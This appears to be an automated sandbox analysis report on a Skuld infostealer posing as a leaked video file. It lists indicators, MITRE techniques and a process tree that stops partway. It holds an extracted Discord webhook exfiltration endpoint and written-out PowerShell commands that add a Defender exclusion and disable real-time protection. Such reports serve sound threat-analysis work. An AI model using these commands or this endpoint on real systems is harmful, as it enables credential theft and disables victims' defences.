skuld | 4e01f67d085ba2a7adf841ddd17abd8a315589084b08f57aa38f2d94fad2f096

Analysis

max time kernel
600s
max time network
462s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
04-12-2024 19:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Scarlet - Leaked/Videos (4)/InShot_10190927_154545638.exe
Size

9.5MB
MD5

4b4fd9e69f42cb13de665dc393ca174d
SHA1

6dccc955f9e3ceb435790a93ecd37e9584d07526
SHA256

09d72f61453036336d192add55ec5b538b0d10a8d0901c84a039e2ab18c8bc46
SHA512

7d7c6f2e2f35b35c997a61922b9a4e8d054f79c4a5163f45c07d53ebfc04ad7ebeeb7fa769bdf3712c84654a6994621d2134b890b6b2ec08265802a93e3edb79
SSDEEP

98304:8vksIj0SI3ZpInyzr70vjDy3yMJEEYXOSF8Me53H:8Ls0SI3cckvjDyCMKEYX7e53H

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1239728722446127235/CpLJBY80lsrvoWdpGjb7u3dhcW1liVDmy8--92GwopK7rc1uao8ShPq737KOZB0mDKuj

Signatures

Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4640	powershell.exe
1256	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	InShot_10190927_154545638.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	InShot_10190927_154545638.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	discord.com
7	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	api.ipify.org
1	ip-api.com
2	api.ipify.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	InShot_10190927_154545638.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	InShot_10190927_154545638.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3092	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
236	wmic.exe
572	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	5	Go-http-client/1.1

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	InShot_10190927_154545638.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	InShot_10190927_154545638.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	InShot_10190927_154545638.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	InShot_10190927_154545638.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	InShot_10190927_154545638.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	InShot_10190927_154545638.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
1256	powershell.exe
1256	powershell.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4640	powershell.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4640	powershell.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe
4228	InShot_10190927_154545638.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4228	InShot_10190927_154545638.exe
Token: SeIncreaseQuotaPrivilege	2744	wmic.exe
Token: SeSecurityPrivilege	2744	wmic.exe
Token: SeTakeOwnershipPrivilege	2744	wmic.exe
Token: SeLoadDriverPrivilege	2744	wmic.exe
Token: SeSystemProfilePrivilege	2744	wmic.exe
Token: SeSystemtimePrivilege	2744	wmic.exe
Token: SeProfSingleProcessPrivilege	2744	wmic.exe
Token: SeIncBasePriorityPrivilege	2744	wmic.exe
Token: SeCreatePagefilePrivilege	2744	wmic.exe
Token: SeBackupPrivilege	2744	wmic.exe
Token: SeRestorePrivilege	2744	wmic.exe
Token: SeShutdownPrivilege	2744	wmic.exe
Token: SeDebugPrivilege	2744	wmic.exe
Token: SeSystemEnvironmentPrivilege	2744	wmic.exe
Token: SeRemoteShutdownPrivilege	2744	wmic.exe
Token: SeUndockPrivilege	2744	wmic.exe
Token: SeManageVolumePrivilege	2744	wmic.exe
Token: 33	2744	wmic.exe
Token: 34	2744	wmic.exe
Token: 35	2744	wmic.exe
Token: 36	2744	wmic.exe
Token: SeIncreaseQuotaPrivilege	2744	wmic.exe
Token: SeSecurityPrivilege	2744	wmic.exe
Token: SeTakeOwnershipPrivilege	2744	wmic.exe
Token: SeLoadDriverPrivilege	2744	wmic.exe
Token: SeSystemProfilePrivilege	2744	wmic.exe
Token: SeSystemtimePrivilege	2744	wmic.exe
Token: SeProfSingleProcessPrivilege	2744	wmic.exe
Token: SeIncBasePriorityPrivilege	2744	wmic.exe
Token: SeCreatePagefilePrivilege	2744	wmic.exe
Token: SeBackupPrivilege	2744	wmic.exe
Token: SeRestorePrivilege	2744	wmic.exe
Token: SeShutdownPrivilege	2744	wmic.exe
Token: SeDebugPrivilege	2744	wmic.exe
Token: SeSystemEnvironmentPrivilege	2744	wmic.exe
Token: SeRemoteShutdownPrivilege	2744	wmic.exe
Token: SeUndockPrivilege	2744	wmic.exe
Token: SeManageVolumePrivilege	2744	wmic.exe
Token: 33	2744	wmic.exe
Token: 34	2744	wmic.exe
Token: 35	2744	wmic.exe
Token: 36	2744	wmic.exe
Token: SeIncreaseQuotaPrivilege	236	wmic.exe
Token: SeSecurityPrivilege	236	wmic.exe
Token: SeTakeOwnershipPrivilege	236	wmic.exe
Token: SeLoadDriverPrivilege	236	wmic.exe
Token: SeSystemProfilePrivilege	236	wmic.exe
Token: SeSystemtimePrivilege	236	wmic.exe
Token: SeProfSingleProcessPrivilege	236	wmic.exe
Token: SeIncBasePriorityPrivilege	236	wmic.exe
Token: SeCreatePagefilePrivilege	236	wmic.exe
Token: SeBackupPrivilege	236	wmic.exe
Token: SeRestorePrivilege	236	wmic.exe
Token: SeShutdownPrivilege	236	wmic.exe
Token: SeDebugPrivilege	236	wmic.exe
Token: SeSystemEnvironmentPrivilege	236	wmic.exe
Token: SeRemoteShutdownPrivilege	236	wmic.exe
Token: SeUndockPrivilege	236	wmic.exe
Token: SeManageVolumePrivilege	236	wmic.exe
Token: 33	236	wmic.exe
Token: 34	236	wmic.exe
Token: 35	236	wmic.exe
Token: 36	236	wmic.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 4228 wrote to memory of 2100	4228	InShot_10190927_154545638.exe	78
PID 4228 wrote to memory of 2100	4228	InShot_10190927_154545638.exe	78
PID 4228 wrote to memory of 3300	4228	InShot_10190927_154545638.exe	79
PID 4228 wrote to memory of 3300	4228	InShot_10190927_154545638.exe	79
PID 4228 wrote to memory of 2744	4228	InShot_10190927_154545638.exe	80
PID 4228 wrote to memory of 2744	4228	InShot_10190927_154545638.exe	80
PID 4228 wrote to memory of 236	4228	InShot_10190927_154545638.exe	82
PID 4228 wrote to memory of 236	4228	InShot_10190927_154545638.exe	82
PID 4228 wrote to memory of 1056	4228	InShot_10190927_154545638.exe	83
PID 4228 wrote to memory of 1056	4228	InShot_10190927_154545638.exe	83
PID 4228 wrote to memory of 1256	4228	InShot_10190927_154545638.exe	84
PID 4228 wrote to memory of 1256	4228	InShot_10190927_154545638.exe	84
PID 4228 wrote to memory of 4564	4228	InShot_10190927_154545638.exe	85
PID 4228 wrote to memory of 4564	4228	InShot_10190927_154545638.exe	85
PID 4228 wrote to memory of 572	4228	InShot_10190927_154545638.exe	86
PID 4228 wrote to memory of 572	4228	InShot_10190927_154545638.exe	86
PID 4228 wrote to memory of 4640	4228	InShot_10190927_154545638.exe	87
PID 4228 wrote to memory of 4640	4228	InShot_10190927_154545638.exe	87
PID 4228 wrote to memory of 1896	4228	InShot_10190927_154545638.exe	88
PID 4228 wrote to memory of 1896	4228	InShot_10190927_154545638.exe	88
PID 4228 wrote to memory of 3092	4228	InShot_10190927_154545638.exe	89
PID 4228 wrote to memory of 3092	4228	InShot_10190927_154545638.exe	89
PID 4228 wrote to memory of 3124	4228	InShot_10190927_154545638.exe	90
PID 4228 wrote to memory of 3124	4228	InShot_10190927_154545638.exe	90
PID 4228 wrote to memory of 1580	4228	InShot_10190927_154545638.exe	91
PID 4228 wrote to memory of 1580	4228	InShot_10190927_154545638.exe	91
PID 4228 wrote to memory of 2168	4228	InShot_10190927_154545638.exe	92
PID 4228 wrote to memory of 2168	4228	InShot_10190927_154545638.exe	92
PID 2168 wrote to memory of 1276	2168	powershell.exe	93
PID 2168 wrote to memory of 1276	2168	powershell.exe	93
PID 1276 wrote to memory of 4884	1276	csc.exe	94
PID 1276 wrote to memory of 4884	1276	csc.exe	94

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2100	attrib.exe
3300	attrib.exe
1580	attrib.exe
3124	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Scarlet - Leaked\Videos (4)\InShot_10190927_154545638.exe
"C:\Users\Admin\AppData\Local\Temp\Scarlet - Leaked\Videos (4)\InShot_10190927_154545638.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4228
- C:\Windows\system32\attrib.exe
  attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Scarlet - Leaked\Videos (4)\InShot_10190927_154545638.exe"
  2⤵
  - Views/modifies file attributes
  PID:2100
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:3300
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2744
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:236
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:1056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Scarlet - Leaked\Videos (4)\InShot_10190927_154545638.exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1256
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:4564
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
